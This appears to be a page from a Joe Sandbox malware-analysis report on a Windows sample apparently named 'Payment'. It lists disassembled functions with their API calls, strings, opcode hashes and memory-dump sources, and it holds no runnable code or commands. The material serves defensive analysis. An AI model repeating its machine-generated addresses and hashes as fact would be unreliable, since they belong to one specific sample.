                                                          • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_iswctype
                                                          • String ID: %s%u
                                                          • API String ID: 3744389584-679674701
                                                          • Opcode ID: 5122bce3af01df3034ca261f7435f6370562d98ba517d02283db119efcfef12b
                                                          • Instruction ID: 513ae69425087dffca271315bc1f7dc36a65dc52a5edd802f065750cc7e14451
                                                          • Opcode Fuzzy Hash: 5122bce3af01df3034ca261f7435f6370562d98ba517d02283db119efcfef12b
                                                          • Instruction Fuzzy Hash: 23A1DD72204726ABDB14DF64D884BAAF7E8FF04355F1086A9F99DC2190DB30E945CB92
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • GetClassNameW.USER32(00000008,?,00000400), ref: 00B2B3DB
                                                          • _wcscmp.LIBCMT ref: 00B2B3EC
                                                          • GetWindowTextW.USER32(00000001,?,00000400), ref: 00B2B414
                                                          • CharUpperBuffW.USER32(?,00000000), ref: 00B2B431
                                                          • _wcscmp.LIBCMT ref: 00B2B44F
                                                          • _wcsstr.LIBCMT ref: 00B2B460
                                                          • GetClassNameW.USER32(00000018,?,00000400), ref: 00B2B498
                                                          • _wcscmp.LIBCMT ref: 00B2B4A8
                                                          • GetWindowTextW.USER32(00000002,?,00000400), ref: 00B2B4CF
                                                          • GetClassNameW.USER32(00000018,?,00000400), ref: 00B2B518
                                                          • _wcscmp.LIBCMT ref: 00B2B528
                                                          • GetClassNameW.USER32(00000010,?,00000400), ref: 00B2B550
                                                          • GetWindowRect.USER32(00000004,?), ref: 00B2B5B9
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2155972236.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 00000000.00000002.2155945406.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156203257.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156244856.0000000000B98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ad0000_Payment.jbxd
                                                          Similarity
                                                          • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                                                          • String ID: @$ThumbnailClass
                                                          • API String ID: 1788623398-1539354611
                                                          • Opcode ID: 3ca6ba6a73099f50fca0f3b443c9bfb3217f82d0f14c3085983a2f676a52da2b
                                                          • Instruction ID: 497ab6698be9ea970f8023a15fc7d313e5c3118fb67cf6dd095fcfefa77c3997
                                                          • Opcode Fuzzy Hash: 3ca6ba6a73099f50fca0f3b443c9bfb3217f82d0f14c3085983a2f676a52da2b
                                                          • Instruction Fuzzy Hash: F381C1720043169BDB05DF10E985FBABBE8EF54314F0885AAFD898A1A2DF34DD45CB61
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2155972236.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 00000000.00000002.2155945406.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156203257.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156244856.0000000000B98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ad0000_Payment.jbxd
                                                          Similarity
                                                          • API ID: __wcsnicmp
                                                          • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                                          • API String ID: 1038674560-1810252412
                                                          • Opcode ID: 8d88b8cc4a84f519e8285a2ba95ab6feb1d327272e00d4ffa215adf148fbaf79
                                                          • Instruction ID: 8c2257a674e93456aaa30a137da33b6bf2c544e16ca6e70e3af50a2ef904e9a4
                                                          • Opcode Fuzzy Hash: 8d88b8cc4a84f519e8285a2ba95ab6feb1d327272e00d4ffa215adf148fbaf79
                                                          • Instruction Fuzzy Hash: AD31AD31A04319A6DF14FAA0DE83EFE7BE4AF10750F6401AAB456721F2FF616E04C651
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • LoadIconW.USER32(00000063), ref: 00B2C4D4
                                                          • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00B2C4E6
                                                          • SetWindowTextW.USER32(?,?), ref: 00B2C4FD
                                                          • GetDlgItem.USER32(?,000003EA), ref: 00B2C512
                                                          • SetWindowTextW.USER32(00000000,?), ref: 00B2C518
                                                          • GetDlgItem.USER32(?,000003E9), ref: 00B2C528
                                                          • SetWindowTextW.USER32(00000000,?), ref: 00B2C52E
                                                          • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00B2C54F
                                                          • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 00B2C569
                                                          • GetWindowRect.USER32(?,?), ref: 00B2C572
                                                          • SetWindowTextW.USER32(?,?), ref: 00B2C5DD
                                                          • GetDesktopWindow.USER32 ref: 00B2C5E3
                                                          • GetWindowRect.USER32(00000000), ref: 00B2C5EA
                                                          • MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 00B2C636
                                                          • GetClientRect.USER32(?,?), ref: 00B2C643
                                                          • PostMessageW.USER32(?,00000005,00000000,00000000), ref: 00B2C668
                                                          • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 00B2C693
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2155972236.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 00000000.00000002.2155945406.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156203257.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156244856.0000000000B98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ad0000_Payment.jbxd
                                                          Similarity
                                                          • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                                          • String ID:
                                                          • API String ID: 3869813825-0
                                                          • Opcode ID: c70ab357e9d94c2f43c722feae0021e34d626e3d583eb183318318f66e783c8a
                                                          • Instruction ID: 8043958aeaf973d2940a3a798f3041d781055d01caea0a3b8a25b5bf04bc8ae3
                                                          • Opcode Fuzzy Hash: c70ab357e9d94c2f43c722feae0021e34d626e3d583eb183318318f66e783c8a
                                                          • Instruction Fuzzy Hash: 10515D7190071AAFDB209FA8DE85B6FBBF5FF04705F004968E686A35A0DB75E904CB50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • _memset.LIBCMT ref: 00B5A4C8
                                                          • DestroyWindow.USER32(?,?), ref: 00B5A542
                                                            • Part of subcall function 00AD7D2C: _memmove.LIBCMT ref: 00AD7D66
                                                          • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00B5A5BC
                                                          • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00B5A5DE
                                                          • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00B5A5F1
                                                          • DestroyWindow.USER32(00000000), ref: 00B5A613
                                                          • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00AD0000,00000000), ref: 00B5A64A
                                                          • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00B5A663
                                                          • GetDesktopWindow.USER32 ref: 00B5A67C
                                                          • GetWindowRect.USER32(00000000), ref: 00B5A683
                                                          • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00B5A69B
                                                          • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00B5A6B3
                                                            • Part of subcall function 00AD25DB: GetWindowLongW.USER32(?,000000EB), ref: 00AD25EC
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2155972236.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 00000000.00000002.2155945406.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156203257.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156244856.0000000000B98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ad0000_Payment.jbxd
                                                          Similarity
                                                          • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
                                                          • String ID: 0$tooltips_class32
                                                          • API String ID: 1297703922-3619404913
                                                          • Opcode ID: b0b5597850d2ef397d45f3314181bc38724373f6d74b349533f040bccd78a6a7
                                                          • Instruction ID: 5bd97314d930a51b74ae9e76b963df0b2fe6333669b45ae075645f6094045d9e
                                                          • Opcode Fuzzy Hash: b0b5597850d2ef397d45f3314181bc38724373f6d74b349533f040bccd78a6a7
                                                          • Instruction Fuzzy Hash: 2B719C75140305AFD721DF68DC49F6A7BE5FB88301F0846AEF985972A0DB70E906CB12
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                            • Part of subcall function 00AD2612: GetWindowLongW.USER32(?,000000EB), ref: 00AD2623
                                                          • DragQueryPoint.SHELL32(?,?), ref: 00B5C917
                                                            • Part of subcall function 00B5ADF1: ClientToScreen.USER32(?,?), ref: 00B5AE1A
                                                            • Part of subcall function 00B5ADF1: GetWindowRect.USER32(?,?), ref: 00B5AE90
                                                            • Part of subcall function 00B5ADF1: PtInRect.USER32(?,?,00B5C304), ref: 00B5AEA0
                                                          • SendMessageW.USER32(?,000000B0,?,?), ref: 00B5C980
                                                          • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 00B5C98B
                                                          • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00B5C9AE
                                                          • _wcscat.LIBCMT ref: 00B5C9DE
                                                          • SendMessageW.USER32(?,000000C2,00000001,?), ref: 00B5C9F5
                                                          • SendMessageW.USER32(?,000000B0,?,?), ref: 00B5CA0E
                                                          • SendMessageW.USER32(?,000000B1,?,?), ref: 00B5CA25
                                                          • SendMessageW.USER32(?,000000B1,?,?), ref: 00B5CA47
                                                          • DragFinish.SHELL32(?), ref: 00B5CA4E
                                                          • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 00B5CB41
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2155972236.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 00000000.00000002.2155945406.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156203257.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156244856.0000000000B98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ad0000_Payment.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
                                                          • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                                          • API String ID: 169749273-3440237614
                                                          • Opcode ID: c0bc9619926e6822e93ef161d679ccc15472517c9416f2afca4b2dfce5c2d73b
                                                          • Instruction ID: ccc5b468c76c50fab460ab1c811184bcc74063a6c1c91775c1454a3fcfff62a4
                                                          • Opcode Fuzzy Hash: c0bc9619926e6822e93ef161d679ccc15472517c9416f2afca4b2dfce5c2d73b
                                                          • Instruction Fuzzy Hash: F7614E71108301AFC711EF64CD85E9FBBE9EF88751F0009AEF592972A1DB709949CB52
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • CharUpperBuffW.USER32(?,?), ref: 00B546AB
                                                          • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00B546F6
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2155972236.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 00000000.00000002.2155945406.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156203257.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156244856.0000000000B98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ad0000_Payment.jbxd
                                                          Similarity
                                                          • API ID: BuffCharMessageSendUpper
                                                          • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                          • API String ID: 3974292440-4258414348
                                                          • Opcode ID: f513fea315b68c5676856d603ad8c1dc3cb77669c7994067b20e39cf3cd42362
                                                          • Instruction ID: b415fb4dadcce09b8fca509f6919aa62f431d9b2b14ee0e1395b92930a17c6d2
                                                          • Opcode Fuzzy Hash: f513fea315b68c5676856d603ad8c1dc3cb77669c7994067b20e39cf3cd42362
                                                          • Instruction Fuzzy Hash: 80915C352047159FCB14EF20C591B6AB7E1AF99358F0448DDBC9A5B3A2DB30ED4ACB81
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 00B5BB6E
                                                          • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,00B59431), ref: 00B5BBCA
                                                          • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00B5BC03
                                                          • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 00B5BC46
                                                          • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00B5BC7D
                                                          • FreeLibrary.KERNEL32(?), ref: 00B5BC89
                                                          • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00B5BC99
                                                          • DestroyIcon.USER32(?,?,?,?,?,00B59431), ref: 00B5BCA8
                                                          • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00B5BCC5
                                                          • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00B5BCD1
                                                            • Part of subcall function 00AF313D: __wcsicmp_l.LIBCMT ref: 00AF31C6
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2155972236.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 00000000.00000002.2155945406.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156203257.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156244856.0000000000B98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ad0000_Payment.jbxd
                                                          Similarity
                                                          • API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
                                                          • String ID: .dll$.exe$.icl
                                                          • API String ID: 1212759294-1154884017
                                                          • Opcode ID: e83c36091e920d774c652c0b345ce84e2b785675e32e21c3bb675826fcd732f0
                                                          • Instruction ID: 1a16235eee72fdd9d487f876c4bcb95284e71b892fb1a7d1c380039c4fd14fcd
                                                          • Opcode Fuzzy Hash: e83c36091e920d774c652c0b345ce84e2b785675e32e21c3bb675826fcd732f0
                                                          • Instruction Fuzzy Hash: 3C61D171900619BAEB14DF64CD85FBE7BE8EB08712F104199FD15D61D0DBB4AD84CBA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                            • Part of subcall function 00AD9997: __itow.LIBCMT ref: 00AD99C2
                                                            • Part of subcall function 00AD9997: __swprintf.LIBCMT ref: 00AD9A0C
                                                          • CharLowerBuffW.USER32(?,?), ref: 00B3A636
                                                          • GetDriveTypeW.KERNEL32 ref: 00B3A683
                                                          • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00B3A6CB
                                                          • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00B3A702
                                                          • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00B3A730
                                                            • Part of subcall function 00AD7D2C: _memmove.LIBCMT ref: 00AD7D66
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2155972236.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 00000000.00000002.2155945406.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156203257.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156244856.0000000000B98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ad0000_Payment.jbxd
                                                          Similarity
                                                          • API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
                                                          • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                          • API String ID: 2698844021-4113822522
                                                          • Opcode ID: b7f9c43e40f276f3872d892ca1687f74637721626e5e14980218d35f6f7ae1e2
                                                          • Instruction ID: a58b10bff4ebbed780b5c8cf02ae4aaf12a3c9d5c57d52b4253c3780d38bef78
                                                          • Opcode Fuzzy Hash: b7f9c43e40f276f3872d892ca1687f74637721626e5e14980218d35f6f7ae1e2
                                                          • Instruction Fuzzy Hash: C4513A711043059FC704EF20C99196AB7F8FF98758F1449AEF89657261EB31EE0ACB52
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00B3A47A
                                                          • __swprintf.LIBCMT ref: 00B3A49C
                                                          • CreateDirectoryW.KERNEL32(?,00000000), ref: 00B3A4D9
                                                          • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00B3A4FE
                                                          • _memset.LIBCMT ref: 00B3A51D
                                                          • _wcsncpy.LIBCMT ref: 00B3A559
                                                          • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 00B3A58E
                                                          • CloseHandle.KERNEL32(00000000), ref: 00B3A599
                                                          • RemoveDirectoryW.KERNEL32(?), ref: 00B3A5A2
                                                          • CloseHandle.KERNEL32(00000000), ref: 00B3A5AC
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2155972236.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 00000000.00000002.2155945406.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156203257.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156244856.0000000000B98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ad0000_Payment.jbxd
                                                          Similarity
                                                          • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                                                          • String ID: :$\$\??\%s
                                                          • API String ID: 2733774712-3457252023
                                                          • Opcode ID: 6a86ac3a8db1c9c2398962f5d6198f641ddf6875579b8f44ad36adfd22856f2b
                                                          • Instruction ID: b82e674b76c6cfb835c6662bac859ab2efd132f5f1e0116eafd630601c08cccf
                                                          • Opcode Fuzzy Hash: 6a86ac3a8db1c9c2398962f5d6198f641ddf6875579b8f44ad36adfd22856f2b
                                                          • Instruction Fuzzy Hash: 513162B550021AABDB219FA0DC49FFB77BCEF88701F2041F6F648D6160EB7096458B25
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • __wsplitpath.LIBCMT ref: 00B3DC7B
                                                          • _wcscat.LIBCMT ref: 00B3DC93
                                                          • _wcscat.LIBCMT ref: 00B3DCA5
                                                          • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00B3DCBA
                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 00B3DCCE
                                                          • GetFileAttributesW.KERNEL32(?), ref: 00B3DCE6
                                                          • SetFileAttributesW.KERNEL32(?,00000000), ref: 00B3DD00
                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 00B3DD12
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2155972236.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 00000000.00000002.2155945406.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156203257.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156244856.0000000000B98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ad0000_Payment.jbxd
                                                          Similarity
                                                          • API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
                                                          • String ID: *.*
                                                          • API String ID: 34673085-438819550
                                                          • Opcode ID: c458070890708222c2af6e078234ebf3054668175604bece4b98fe9977b2d6f2
                                                          • Instruction ID: 88a013b765d1199187bee77fc3310b22086fc27c6ec3e7e480edcfcdc9564c0c
                                                          • Opcode Fuzzy Hash: c458070890708222c2af6e078234ebf3054668175604bece4b98fe9977b2d6f2
                                                          • Instruction Fuzzy Hash: DD8181715143419FCB24EF24D8859AAF7E8FB88310F658CAEF885C7250EB30D945CB52
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                            • Part of subcall function 00AD2612: GetWindowLongW.USER32(?,000000EB), ref: 00AD2623
                                                          • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00B5C4EC
                                                          • GetFocus.USER32 ref: 00B5C4FC
                                                          • GetDlgCtrlID.USER32(00000000), ref: 00B5C507
                                                          • _memset.LIBCMT ref: 00B5C632
                                                          • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 00B5C65D
                                                          • GetMenuItemCount.USER32(?), ref: 00B5C67D
                                                          • GetMenuItemID.USER32(?,00000000), ref: 00B5C690
                                                          • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 00B5C6C4
                                                          • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 00B5C70C
                                                          • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00B5C744
                                                          • DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 00B5C779
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2155972236.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 00000000.00000002.2155945406.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156203257.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156244856.0000000000B98000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ad0000_Payment.jbxd
                                                          Similarity
                                                          • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
                                                          • String ID: 0
                                                          • API String ID: 1296962147-4108050209
                                                          • Opcode ID: 93e4f8e33fb0a7844330e0542ba5a199b95c42f1df78e5b570d7fe2d023ce11c
                                                          • Instruction ID: 4a8ec1aeefaf476ee1f47b9542f3f56bfea426493c47007c2cd57e6cec20581d
                                                          • Opcode Fuzzy Hash: 93e4f8e33fb0a7844330e0542ba5a199b95c42f1df78e5b570d7fe2d023ce11c
                                                          • Instruction Fuzzy Hash: 28819C702083019FDB10CF24D984B6BBBEAEB98356F1045AEFD9597291DB70DD09CB92
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                            • Part of subcall function 00B2874A: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00B28766
                                                            • Part of subcall function 00B2874A: GetLastError.KERNEL32(?,00B2822A,?,?,?), ref: 00B28770
                                                            • Part of subcall function 00B2874A: GetProcessHeap.KERNEL32(00000008,?,?,00B2822A,?,?,?), ref: 00B2877F
                                                            • Part of subcall function 00B2874A: HeapAlloc.KERNEL32(00000000,?,00B2822A,?,?,?), ref: 00B28786
                                                            • Part of subcall function 00B2874A: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00B2879D
                                                            • Part of subcall function 00B287E7: GetProcessHeap.KERNEL32(00000008,00B28240,00000000,00000000,?,00B28240,?), ref: 00B287F3
                                                            • Part of subcall function 00B287E7: HeapAlloc.KERNEL32(00000000,?,00B28240,?), ref: 00B287FA
                                                            • Part of subcall function 00B287E7: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00B28240,?), ref: 00B2880B
                                                          • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00B28458
                                                          • _memset.LIBCMT ref: 00B2846D
                                                          • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00B2848C
                                                          • GetLengthSid.ADVAPI32(?), ref: 00B2849D
                                                          • GetAce.ADVAPI32(?,00000000,?), ref: 00B284DA
                                                          • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00B284F6
                                                          • GetLengthSid.ADVAPI32(?), ref: 00B28513
                                                          • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00B28522
                                                          • HeapAlloc.KERNEL32(00000000), ref: 00B28529
                                                          • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00B2854A
                                                          • CopySid.ADVAPI32(00000000), ref: 00B28551
                                                          • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00B28582
                                                          • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00B285A8
                                                          • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00B285BC
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2155972236.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 00000000.00000002.2155945406.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156025250.0000000000B85000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2156203257.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
